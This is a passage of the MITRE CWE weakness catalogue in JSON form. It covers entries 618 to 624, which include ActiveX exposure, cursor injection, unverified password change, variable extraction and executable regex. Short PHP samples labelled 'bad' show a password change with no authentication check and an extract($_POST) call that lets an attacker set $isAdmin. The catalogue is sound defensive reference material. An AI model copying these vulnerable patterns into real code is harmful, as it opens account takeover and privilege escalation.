(2011)"},"Entry_ID":"MET01-J","Entry_Name":"Never use assertions to validate method arguments"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP3","Entry_Name":"Use of an improper API"}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2007-05-07"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Observed_Example, Other_Notes, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Observed_Examples, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Common_Consequences, Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Alternate_Terms"}]}},"618":{"attr":{"@_ID":"618","@_Name":"Exposed Unsafe ActiveX Method","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"An ActiveX control is intended for use in a web browser, but it exposes dangerous methods that perform actions that are outside of the browser\'s security model (e.g. the zone or domain).","Extended_Description":"ActiveX controls can exercise far greater control over the operating system than typical Java or javascript. Exposed methods can be subject to various vulnerabilities, depending on the implemented behaviors of those methods, and whether input validation is performed on the provided arguments. If there is no integrity checking or origin validation, this method could be invoked by attackers.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"749","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Other"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"If you must expose a method, make sure to perform input validation on all arguments, and protect against all possible vulnerabilities."},{"Phase":"Architecture and Design","Description":"Use code signing, although this does not protect against any weaknesses that are already in the control."},{"Phase":["Architecture and Design","System Configuration"],"Description":"Where possible, avoid marking the control as safe for scripting."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2007-1120","Description":"download a file to arbitrary folders.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1120"},{"Reference":"CVE-2006-6838","Description":"control downloads and executes a url in a parameter","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6838"},{"Reference":"CVE-2007-0321","Description":"resultant buffer overflow","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0321"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-503"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 12, &#34;ActiveX Security&#34;, Page 749"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2007-05-07"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Observed_Example, Other_Notes, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated References, Relationships"}]}},"619":{"attr":{"@_ID":"619","@_Name":"Dangling Database Cursor (\'Cursor Injection\')","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"If a database cursor is not closed properly, then it could become accessible to other users while retaining the same privileges that were originally assigned, leaving the cursor \\"dangling.\\"","Extended_Description":"For example, an improper dangling cursor could arise from unhandled exceptions. The impact of the issue depends on the cursor\'s role, but SQL injection attacks are commonly possible.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"402","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":[{"Ordinality":"Primary","Description":"This could be primary when the programmer never attempts to close the cursor when finished with it."},{"Ordinality":"Resultant"}]},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"SQL","@_Prevalence":"Undetermined"}}},"Background_Details":{"Background_Detail":"A cursor is a feature in Oracle PL/SQL and other languages that provides a handle for executing and accessing the results of SQL queries."},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"This issue is currently reported for unhandled exceptions, but it is theoretically possible any time the programmer does not close the cursor at the proper time."}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Application Data","Modify Application Data"]}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Close cursors immediately after access to them is complete. Ensure that you close cursors if exceptions occur."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-505"}},{"attr":{"@_External_Reference_ID":"REF-506"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2007-05-07"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Background_Details, Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Modes_of_Introduction, Other_Notes, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Dangling Database Cursor (Cursor Injection)","attr":{"@_Date":"2008-04-11"}},{"#text":"Dangling Database Cursor (aka \'Cursor Injection\')","attr":{"@_Date":"2009-05-27"}}]}},"620":{"attr":{"@_ID":"620","@_Name":"Unverified Password Change","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"When setting a new password for a user, the product does not require knowledge of the original password, or using another form of authentication.","Extended_Description":"This could be used by an attacker to change passwords for another user, thus gaining the privileges associated with that user.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"287","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":[{"Ordinality":"Primary"},{"Ordinality":"Resultant"}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":["Bypass Protection Mechanism","Gain Privileges or Assume Identity"]}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"When prompting for a password change, force the user to provide the original password in addition to the new password."},{"Phase":"Architecture and Design","Description":"Do not use \\"forgotten password\\" functionality. But if you must, ensure that you are only providing information to the actual user, e.g. by using an email address or challenge question that the legitimate user already provided in the past; do not allow the current user to change this identity information until the correct password has been provided."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-56"},"Intro_Text":"This code changes a user\'s password.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"$user = $_GET[\'user\'];$pass = $_GET[\'pass\'];$checkpass = $_GET[\'checkpass\'];if ($pass == $checkpass) {}","xhtml:br":["","",""],"xhtml:div":{"#text":"SetUserPassword($user, $pass);","attr":{"@_style":"margin-left:10px;"}}}},"Body_Text":"While the code confirms that the requesting user typed the same new password twice, it does not confirm that the user requesting the password change is the same user whose password will be changed. An attacker can request a change of another user\'s password and gain control of the victim\'s account."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2007-0681","Description":"Web app allows remote attackers to change the passwords of arbitrary users without providing the original password, and possibly perform other unauthorized actions.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0681"},{"Reference":"CVE-2000-0944","Description":"Web application password change utility doesn\'t check the original password.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0944"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A3","Entry_Name":"Broken Authentication and Session Management","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP31","Entry_Name":"Missing authentication"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 19: Use of Weak Password-Based Systems.&#34; Page 279"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2007-05-07"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"Veracode","Modification_Date":"2008-08-15","Modification_Comment":"Suggested OWASP Top Ten 2004 mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Observed_Example, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Other_Notes, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, Observed_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships, Type"}]}},"621":{"attr":{"@_ID":"621","@_Name":"Variable Extraction Error","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product uses external input to determine the names of variables into which information is extracted, without verifying that the names of the specified variables are valid. This could cause the program to overwrite unintended variables.","Extended_Description":{"xhtml:p":["For example, in PHP, extraction can be used to provide functionality similar to register_globals, a dangerous functionality that is frequently disabled in production systems. Calling extract() or import_request_variables() without the proper arguments could allow arbitrary global variables to be overwritten, including superglobals.","Similar functionality is possible in other interpreted languages, including custom languages."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"914","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"471","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"PHP","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":{"Term":"Variable overwrite"}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Modify Application Data","Note":"An attacker could modify sensitive data or program variables."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Strategy":"Input Validation","Description":"Use allowlists of variable names that can be extracted."},{"Phase":"Implementation","Description":"Consider refactoring your code to avoid extraction routines altogether."},{"Phase":"Implementation","Description":"In PHP, call extract() with options such as EXTR_SKIP and EXTR_PREFIX_ALL; call import_request_variables() with a prefix argument. Note that these capabilities are not present in all PHP versions."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-107"},"Intro_Text":"This code uses the credentials sent in a POST request to login a user.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"function login($user,$pass){}$isAdmin = false;extract($_POST);login(mysql_real_escape_string($user),mysql_real_escape_string($pass));","xhtml:i":"//Log user in, and set $isAdmin to true if user is an administrator","xhtml:br":["","","","","",""],"xhtml:div":{"#text":"$query = buildQuery($user,$pass);mysql_query($query);if(getUserRole($user) == \\"Admin\\"){}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""],"xhtml:div":{"#text":"$isAdmin = true;","attr":{"@_style":"margin-left:10px;"}}}}},"Body_Text":"The call to extract() will overwrite the existing values of any variables defined previously, in this case $isAdmin. An attacker can send a POST request with an unexpected third value \\"isAdmin\\" equal to \\"true\\", thus gaining Admin privileges."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2006-7135","Description":"extract issue enables file inclusion","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-7135"},{"Reference":"CVE-2006-7079","Description":"extract used for register_globals compatibility layer, enables path traversal","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-7079"},{"Reference":"CVE-2007-0649","Description":"extract() buried in include files makes post-disclosure analysis confusing; original report had seemed incorrect.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0649"},{"Reference":"CVE-2006-6661","Description":"extract() enables static code injection","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6661"},{"Reference":"CVE-2006-2828","Description":"import_request_variables() buried in include files makes post-disclosure analysis confusing","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2828"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}},"Notes":{"Note":{"#text":"Probably under-reported for PHP. Under-studied for other interpreted languages.","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2007-05-07"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Observed_Example, Other_Notes, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}]}},"622":{"attr":{"@_ID":"622","@_Name":"Improper Validation of Function Hook Arguments","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product adds hooks to user-accessible API functions, but it does not properly validate the arguments. This could lead to resultant vulnerabilities.","Extended_Description":"Such hooks can be used in defensive software that runs with privileges, such as anti-virus or firewall, which hooks kernel calls. When the arguments are not validated, they could be used to bypass the protection scheme or attack the product itself.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"20","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Ensure that all arguments are verified, as defined by the API you are protecting."},{"Phase":"Architecture and Design","Description":"Drop privileges before invoking such functions, if possible."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2007-0708","Description":"DoS in firewall using standard Microsoft functions","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0708"},{"Reference":"CVE-2006-7160","Description":"DoS in firewall using standard Microsoft functions","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-7160"},{"Reference":"CVE-2007-1376","Description":"function does not verify that its argument is the proper type, leading to arbitrary memory write","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1376"},{"Reference":"CVE-2007-1220","Description":"invalid syscall arguments bypass code execution limits","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1220"},{"Reference":"CVE-2006-4541","Description":"DoS in IDS via NULL argument","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4541"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP27","Entry_Name":"Tainted input to environment"}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2007-05-07"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Observed_Example, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Other_Notes, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Name, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Description"}],"Previous_Entry_Name":{"#text":"Unvalidated Function Hook Arguments","attr":{"@_Date":"2012-10-30"}}}},"623":{"attr":{"@_ID":"623","@_Name":"Unsafe ActiveX Control Marked Safe For Scripting","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"An ActiveX control is intended for restricted use, but it has been marked as safe-for-scripting.","Extended_Description":"This might allow attackers to use dangerous functionality via a web page that accesses the control, which can lead to different resultant vulnerabilities, depending on the control\'s behavior.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"267","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"691","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"618","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Code or Commands"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"During development, do not mark it as safe for scripting."},{"Phase":"System Configuration","Description":"After distribution, you can set the kill bit for the control so that it is not accessible from Internet Explorer."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2007-0617","Description":"control allows attackers to add malicious email addresses to bypass spam limits","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0617"},{"Reference":"CVE-2007-0219","Description":"web browser uses certain COM objects as ActiveX","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0219"},{"Reference":"CVE-2006-6510","Description":"kiosk allows bypass to read files","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6510"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-503"}},{"attr":{"@_External_Reference_ID":"REF-510"}},{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 16, &#34;What ActiveX Components Are Safe for Initialization and Safe for Scripting?&#34; Page 510"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 12, &#34;ActiveX Security&#34;, Page 749"}}]},"Notes":{"Note":{"#text":"It is suspected that this is under-reported.","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2007-05-07"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Observed_Example, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Observed_Examples"}]}},"624":{"attr":{"@_ID":"624","@_Name":"Executable Regular Expression Error","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product uses a regular expression that either (1) contains an executable component with user-controlled inputs, or (2) allows a user to enable execution by inserting pattern modifiers.","Extended_Description":"Case (2) is possible in the PHP preg_replace() function, and possibly in other languages when a user-controlled input is inserted into a string that is later parsed as a regular expression.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"77","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"77","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"77","@_View_ID":"1340","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"PHP","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Perl","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Code or Commands"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"The regular expression feature in some languages allows inputs to be quoted or escaped before insertion, such as \\\\Q and \\\\E in Perl."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2006-2059","Description":"Executable regexp in PHP by inserting \\"e\\" modifier into first argument to preg_replace","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2059"},{"Reference":"CVE-2005-3420","Description":"Executable regexp in PHP by inserting \\"e\\" modifier into first argument to preg_replace","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3420"},{"Reference":"CVE-2006-2878","Description":"Complex curly syntax inserted into the replacement argument to PHP preg_replace(), which uses the \\"/e\\" 